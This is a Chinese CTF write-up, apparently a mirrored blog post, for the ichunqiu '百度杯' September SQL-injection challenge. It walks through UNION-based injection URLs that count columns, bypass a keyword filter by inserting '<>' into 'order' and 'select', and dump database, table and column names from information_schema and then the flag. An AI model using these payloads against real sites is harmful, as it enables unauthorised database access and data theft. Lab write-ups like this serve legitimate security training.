zoukankan      html  css  js  c++  java
  • CTF web之旅 2

    题目地址

    https://www.ichunqiu.com/battalion?t=1
    “百度杯”CTF比赛 九月场  题目名称:SQL注入

    http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=1

    正常回显

    http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1

    没有回显 判断出存在注入点

    判断字段数

    http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=1 ord<>er by 3

    用<>将order分隔开 防止被过滤掉

    判断显示位

    http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1 union sel<>ect 1,2,3

    2 回显出来得知2是回显位 

    爆出数据库名

    http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1 union sel<>ect 1,database(),3

    爆出表

    http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1 union sel<>ect 1,table_name,3 from information_schema.tables where table_schema=database()

    爆出字段

    http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1 union sel<>ect 1,column_name,3 from information_schema.columns where table_name='info'

    爆出最终数据

    http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1 union sel<>ect 1,flAg_T5ZNdrm,3 from info

    得到flag

    下图是information_schema数据库结构图

  • 相关阅读:
    Open Live Writer增加代码插件
    WinSCP列出’/’目录项出错
    Ueditor中增加迅雷下载支持
    Ueditor设置默认字体
    PDF编辑、删除、替换某页面或文字
    个人站长如何使用svn发布到服务器不遗漏文件
    PHP 测试程序运行时间 microtime函数用法
    LeetCode---Stack && Heap
    LeetCode---Binary Search
    LeetCode---Hash Table
  • 原文地址:https://www.cnblogs.com/akger/p/14335668.html
Copyright © 2011-2022 走看看